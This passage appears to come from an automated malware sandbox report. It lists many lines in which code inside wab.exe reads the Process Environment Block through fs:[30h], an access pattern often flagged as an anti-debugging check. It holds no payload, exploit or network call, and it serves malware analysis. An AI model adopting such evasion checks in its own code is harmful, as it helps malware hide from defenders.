              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CB33A0 mov eax, dword ptr fs:[00000030h]26_2_21CB33A0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CB33A0 mov eax, dword ptr fs:[00000030h]26_2_21CB33A0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CA33A5 mov eax, dword ptr fs:[00000030h]26_2_21CA33A5
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C7D34C mov eax, dword ptr fs:[00000030h]26_2_21C7D34C
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C7D34C mov eax, dword ptr fs:[00000030h]26_2_21C7D34C
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D0035C mov eax, dword ptr fs:[00000030h]26_2_21D0035C
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D0035C mov eax, dword ptr fs:[00000030h]26_2_21D0035C
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D0035C mov eax, dword ptr fs:[00000030h]26_2_21D0035C
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D0035C mov ecx, dword ptr fs:[00000030h]26_2_21D0035C
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D0035C mov eax, dword ptr fs:[00000030h]26_2_21D0035C
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D0035C mov eax, dword ptr fs:[00000030h]26_2_21D0035C
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C79353 mov eax, dword ptr fs:[00000030h]26_2_21C79353
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C79353 mov eax, dword ptr fs:[00000030h]26_2_21C79353
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D55341 mov eax, dword ptr fs:[00000030h]26_2_21D55341
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D02349 mov eax, dword ptr fs:[00000030h]26_2_21D02349
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D02349 mov eax, dword ptr fs:[00000030h]26_2_21D02349
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D02349 mov eax, dword ptr fs:[00000030h]26_2_21D02349
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D02349 mov eax, dword ptr fs:[00000030h]26_2_21D02349
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D02349 mov eax, dword ptr fs:[00000030h]26_2_21D02349
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D02349 mov eax, dword ptr fs:[00000030h]26_2_21D02349
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D02349 mov eax, dword ptr fs:[00000030h]26_2_21D02349
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D02349 mov eax, dword ptr fs:[00000030h]26_2_21D02349
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D02349 mov eax, dword ptr fs:[00000030h]26_2_21D02349
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D02349 mov eax, dword ptr fs:[00000030h]26_2_21D02349
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D02349 mov eax, dword ptr fs:[00000030h]26_2_21D02349
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D02349 mov eax, dword ptr fs:[00000030h]26_2_21D02349
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D02349 mov eax, dword ptr fs:[00000030h]26_2_21D02349
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D02349 mov eax, dword ptr fs:[00000030h]26_2_21D02349
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D02349 mov eax, dword ptr fs:[00000030h]26_2_21D02349
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D2437C mov eax, dword ptr fs:[00000030h]26_2_21D2437C
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D3F367 mov eax, dword ptr fs:[00000030h]26_2_21D3F367
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C87370 mov eax, dword ptr fs:[00000030h]26_2_21C87370
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C87370 mov eax, dword ptr fs:[00000030h]26_2_21C87370
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C87370 mov eax, dword ptr fs:[00000030h]26_2_21C87370
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CBA30B mov eax, dword ptr fs:[00000030h]26_2_21CBA30B
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CBA30B mov eax, dword ptr fs:[00000030h]26_2_21CBA30B
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CBA30B mov eax, dword ptr fs:[00000030h]26_2_21CBA30B
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C7C310 mov ecx, dword ptr fs:[00000030h]26_2_21C7C310
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CA0310 mov ecx, dword ptr fs:[00000030h]26_2_21CA0310
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D0930B mov eax, dword ptr fs:[00000030h]26_2_21D0930B
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D0930B mov eax, dword ptr fs:[00000030h]26_2_21D0930B
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D0930B mov eax, dword ptr fs:[00000030h]26_2_21D0930B
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CAF32A mov eax, dword ptr fs:[00000030h]26_2_21CAF32A
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C77330 mov eax, dword ptr fs:[00000030h]26_2_21C77330
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D4132D mov eax, dword ptr fs:[00000030h]26_2_21D4132D
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D4132D mov eax, dword ptr fs:[00000030h]26_2_21D4132D
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CAB2C0 mov eax, dword ptr fs:[00000030h]26_2_21CAB2C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CAB2C0 mov eax, dword ptr fs:[00000030h]26_2_21CAB2C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CAB2C0 mov eax, dword ptr fs:[00000030h]26_2_21CAB2C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CAB2C0 mov eax, dword ptr fs:[00000030h]26_2_21CAB2C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CAB2C0 mov eax, dword ptr fs:[00000030h]26_2_21CAB2C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CAB2C0 mov eax, dword ptr fs:[00000030h]26_2_21CAB2C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CAB2C0 mov eax, dword ptr fs:[00000030h]26_2_21CAB2C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C8A2C3 mov eax, dword ptr fs:[00000030h]26_2_21C8A2C3
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C8A2C3 mov eax, dword ptr fs:[00000030h]26_2_21C8A2C3
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C8A2C3 mov eax, dword ptr fs:[00000030h]26_2_21C8A2C3
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C8A2C3 mov eax, dword ptr fs:[00000030h]26_2_21C8A2C3
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C8A2C3 mov eax, dword ptr fs:[00000030h]26_2_21C8A2C3
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C892C5 mov eax, dword ptr fs:[00000030h]26_2_21C892C5
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C892C5 mov eax, dword ptr fs:[00000030h]26_2_21C892C5
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C7B2D3 mov eax, dword ptr fs:[00000030h]26_2_21C7B2D3
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C7B2D3 mov eax, dword ptr fs:[00000030h]26_2_21C7B2D3
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C7B2D3 mov eax, dword ptr fs:[00000030h]26_2_21C7B2D3
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CAF2D0 mov eax, dword ptr fs:[00000030h]26_2_21CAF2D0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CAF2D0 mov eax, dword ptr fs:[00000030h]26_2_21CAF2D0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C902E1 mov eax, dword ptr fs:[00000030h]26_2_21C902E1
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C902E1 mov eax, dword ptr fs:[00000030h]26_2_21C902E1
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C902E1 mov eax, dword ptr fs:[00000030h]26_2_21C902E1
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D3F2F8 mov eax, dword ptr fs:[00000030h]26_2_21D3F2F8
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D552E2 mov eax, dword ptr fs:[00000030h]26_2_21D552E2
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C792FF mov eax, dword ptr fs:[00000030h]26_2_21C792FF
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D312ED mov eax, dword ptr fs:[00000030h]26_2_21D312ED
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D312ED mov eax, dword ptr fs:[00000030h]26_2_21D312ED
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D312ED mov eax, dword ptr fs:[00000030h]26_2_21D312ED
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D312ED mov eax, dword ptr fs:[00000030h]26_2_21D312ED
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D312ED mov eax, dword ptr fs:[00000030h]26_2_21D312ED
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D312ED mov eax, dword ptr fs:[00000030h]26_2_21D312ED
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D312ED mov eax, dword ptr fs:[00000030h]26_2_21D312ED
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D312ED mov eax, dword ptr fs:[00000030h]26_2_21D312ED
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D312ED mov eax, dword ptr fs:[00000030h]26_2_21D312ED
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D312ED mov eax, dword ptr fs:[00000030h]26_2_21D312ED
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D312ED mov eax, dword ptr fs:[00000030h]26_2_21D312ED
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D312ED mov eax, dword ptr fs:[00000030h]26_2_21D312ED
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D312ED mov eax, dword ptr fs:[00000030h]26_2_21D312ED
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D312ED mov eax, dword ptr fs:[00000030h]26_2_21D312ED
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CBE284 mov eax, dword ptr fs:[00000030h]26_2_21CBE284
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CBE284 mov eax, dword ptr fs:[00000030h]26_2_21CBE284
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D00283 mov eax, dword ptr fs:[00000030h]26_2_21D00283
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D00283 mov eax, dword ptr fs:[00000030h]26_2_21D00283
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D00283 mov eax, dword ptr fs:[00000030h]26_2_21D00283
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CB329E mov eax, dword ptr fs:[00000030h]26_2_21CB329E
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CB329E mov eax, dword ptr fs:[00000030h]26_2_21CB329E
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D55283 mov eax, dword ptr fs:[00000030h]26_2_21D55283
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C902A0 mov eax, dword ptr fs:[00000030h]26_2_21C902A0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C902A0 mov eax, dword ptr fs:[00000030h]26_2_21C902A0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C952A0 mov eax, dword ptr fs:[00000030h]26_2_21C952A0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C952A0 mov eax, dword ptr fs:[00000030h]26_2_21C952A0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C952A0 mov eax, dword ptr fs:[00000030h]26_2_21C952A0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C952A0 mov eax, dword ptr fs:[00000030h]26_2_21C952A0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D092BC mov eax, dword ptr fs:[00000030h]26_2_21D092BC
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D092BC mov eax, dword ptr fs:[00000030h]26_2_21D092BC
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D092BC mov ecx, dword ptr fs:[00000030h]26_2_21D092BC
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D092BC mov ecx, dword ptr fs:[00000030h]26_2_21D092BC
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D162A0 mov eax, dword ptr fs:[00000030h]26_2_21D162A0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D162A0 mov ecx, dword ptr fs:[00000030h]26_2_21D162A0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D162A0 mov eax, dword ptr fs:[00000030h]26_2_21D162A0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D162A0 mov eax, dword ptr fs:[00000030h]26_2_21D162A0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D162A0 mov eax, dword ptr fs:[00000030h]26_2_21D162A0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D162A0 mov eax, dword ptr fs:[00000030h]26_2_21D162A0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D172A0 mov eax, dword ptr fs:[00000030h]26_2_21D172A0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D172A0 mov eax, dword ptr fs:[00000030h]26_2_21D172A0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D3B256 mov eax, dword ptr fs:[00000030h]26_2_21D3B256
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D3B256 mov eax, dword ptr fs:[00000030h]26_2_21D3B256
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CB724D mov eax, dword ptr fs:[00000030h]26_2_21CB724D
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C79240 mov eax, dword ptr fs:[00000030h]26_2_21C79240
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C79240 mov eax, dword ptr fs:[00000030h]26_2_21C79240
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C86259 mov eax, dword ptr fs:[00000030h]26_2_21C86259
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D08243 mov eax, dword ptr fs:[00000030h]26_2_21D08243
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D08243 mov ecx, dword ptr fs:[00000030h]26_2_21D08243
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C7A250 mov eax, dword ptr fs:[00000030h]26_2_21C7A250
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D30274 mov eax, dword ptr fs:[00000030h]26_2_21D30274
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D30274 mov eax, dword ptr fs:[00000030h]26_2_21D30274
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D30274 mov eax, dword ptr fs:[00000030h]26_2_21D30274
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D30274 mov eax, dword ptr fs:[00000030h]26_2_21D30274
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D30274 mov eax, dword ptr fs:[00000030h]26_2_21D30274
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D30274 mov eax, dword ptr fs:[00000030h]26_2_21D30274
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D30274 mov eax, dword ptr fs:[00000030h]26_2_21D30274
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D30274 mov eax, dword ptr fs:[00000030h]26_2_21D30274
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D30274 mov eax, dword ptr fs:[00000030h]26_2_21D30274
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D30274 mov eax, dword ptr fs:[00000030h]26_2_21D30274
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D30274 mov eax, dword ptr fs:[00000030h]26_2_21D30274
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D30274 mov eax, dword ptr fs:[00000030h]26_2_21D30274
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C84260 mov eax, dword ptr fs:[00000030h]26_2_21C84260
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C84260 mov eax, dword ptr fs:[00000030h]26_2_21C84260
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C84260 mov eax, dword ptr fs:[00000030h]26_2_21C84260
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C7826B mov eax, dword ptr fs:[00000030h]26_2_21C7826B
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CC1270 mov eax, dword ptr fs:[00000030h]26_2_21CC1270
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CC1270 mov eax, dword ptr fs:[00000030h]26_2_21CC1270
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CA9274 mov eax, dword ptr fs:[00000030h]26_2_21CA9274
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CB7208 mov eax, dword ptr fs:[00000030h]26_2_21CB7208
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CB7208 mov eax, dword ptr fs:[00000030h]26_2_21CB7208
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D55227 mov eax, dword ptr fs:[00000030h]26_2_21D55227
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C7823B mov eax, dword ptr fs:[00000030h]26_2_21C7823B
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D535D7 mov eax, dword ptr fs:[00000030h]26_2_21D535D7
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D535D7 mov eax, dword ptr fs:[00000030h]26_2_21D535D7
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D535D7 mov eax, dword ptr fs:[00000030h]26_2_21D535D7
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CBE5CF mov eax, dword ptr fs:[00000030h]26_2_21CBE5CF
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CBE5CF mov eax, dword ptr fs:[00000030h]26_2_21CBE5CF
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CB55C0 mov eax, dword ptr fs:[00000030h]26_2_21CB55C0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CA95DA mov eax, dword ptr fs:[00000030h]26_2_21CA95DA
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C865D0 mov eax, dword ptr fs:[00000030h]26_2_21C865D0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CBA5D0 mov eax, dword ptr fs:[00000030h]26_2_21CBA5D0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CBA5D0 mov eax, dword ptr fs:[00000030h]26_2_21CBA5D0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D555C9 mov eax, dword ptr fs:[00000030h]26_2_21D555C9
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CFD5D0 mov eax, dword ptr fs:[00000030h]26_2_21CFD5D0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CFD5D0 mov ecx, dword ptr fs:[00000030h]26_2_21CFD5D0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CBC5ED mov eax, dword ptr fs:[00000030h]26_2_21CBC5ED
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CBC5ED mov eax, dword ptr fs:[00000030h]26_2_21CBC5ED
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C825E0 mov eax, dword ptr fs:[00000030h]26_2_21C825E0
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CB4588 mov eax, dword ptr fs:[00000030h]26_2_21CB4588
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D0B594 mov eax, dword ptr fs:[00000030h]26_2_21D0B594
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D0B594 mov eax, dword ptr fs:[00000030h]26_2_21D0B594
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C7758F mov eax, dword ptr fs:[00000030h]26_2_21C7758F
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C7758F mov eax, dword ptr fs:[00000030h]26_2_21C7758F
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C7758F mov eax, dword ptr fs:[00000030h]26_2_21C7758F
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C82582 mov eax, dword ptr fs:[00000030h]26_2_21C82582
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C82582 mov ecx, dword ptr fs:[00000030h]26_2_21C82582
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CBE59C mov eax, dword ptr fs:[00000030h]26_2_21CBE59C
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CA15A9 mov eax, dword ptr fs:[00000030h]26_2_21CA15A9
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CA15A9 mov eax, dword ptr fs:[00000030h]26_2_21CA15A9
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CA15A9 mov eax, dword ptr fs:[00000030h]26_2_21CA15A9
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CA15A9 mov eax, dword ptr fs:[00000030h]26_2_21CA15A9
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CA15A9 mov eax, dword ptr fs:[00000030h]26_2_21CA15A9
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D135BA mov eax, dword ptr fs:[00000030h]26_2_21D135BA
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D135BA mov eax, dword ptr fs:[00000030h]26_2_21D135BA
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D135BA mov eax, dword ptr fs:[00000030h]26_2_21D135BA
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D135BA mov eax, dword ptr fs:[00000030h]26_2_21D135BA
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D3F5BE mov eax, dword ptr fs:[00000030h]26_2_21D3F5BE
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D005A7 mov eax, dword ptr fs:[00000030h]26_2_21D005A7
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D005A7 mov eax, dword ptr fs:[00000030h]26_2_21D005A7
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D005A7 mov eax, dword ptr fs:[00000030h]26_2_21D005A7
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CA45B1 mov eax, dword ptr fs:[00000030h]26_2_21CA45B1
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CA45B1 mov eax, dword ptr fs:[00000030h]26_2_21CA45B1
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C88550 mov eax, dword ptr fs:[00000030h]26_2_21C88550
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C88550 mov eax, dword ptr fs:[00000030h]26_2_21C88550
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CB656A mov eax, dword ptr fs:[00000030h]26_2_21CB656A
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CB656A mov eax, dword ptr fs:[00000030h]26_2_21CB656A
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CB656A mov eax, dword ptr fs:[00000030h]26_2_21CB656A
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21C7B562 mov eax, dword ptr fs:[00000030h]26_2_21C7B562
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CBB570 mov eax, dword ptr fs:[00000030h]26_2_21CBB570
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CBB570 mov eax, dword ptr fs:[00000030h]26_2_21CBB570
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CB7505 mov eax, dword ptr fs:[00000030h]26_2_21CB7505
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21CB7505 mov ecx, dword ptr fs:[00000030h]26_2_21CB7505
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D54500 mov eax, dword ptr fs:[00000030h]26_2_21D54500
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D54500 mov eax, dword ptr fs:[00000030h]26_2_21D54500
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D54500 mov eax, dword ptr fs:[00000030h]26_2_21D54500
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D54500 mov eax, dword ptr fs:[00000030h]26_2_21D54500
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D54500 mov eax, dword ptr fs:[00000030h]26_2_21D54500
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D54500 mov eax, dword ptr fs:[00000030h]26_2_21D54500
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D54500 mov eax, dword ptr fs:[00000030h]26_2_21D54500
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D55537 mov eax, dword ptr fs:[00000030h]26_2_21D55537
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D2F525 mov eax, dword ptr fs:[00000030h]26_2_21D2F525
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D2F525 mov eax, dword ptr fs:[00000030h]26_2_21D2F525
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D2F525 mov eax, dword ptr fs:[00000030h]26_2_21D2F525
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D2F525 mov eax, dword ptr fs:[00000030h]26_2_21D2F525
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D2F525 mov eax, dword ptr fs:[00000030h]26_2_21D2F525
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D2F525 mov eax, dword ptr fs:[00000030h]26_2_21D2F525
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 26_2_21D2F525 mov eax, dword ptr fs:[00000030h]26_2_21D2F525
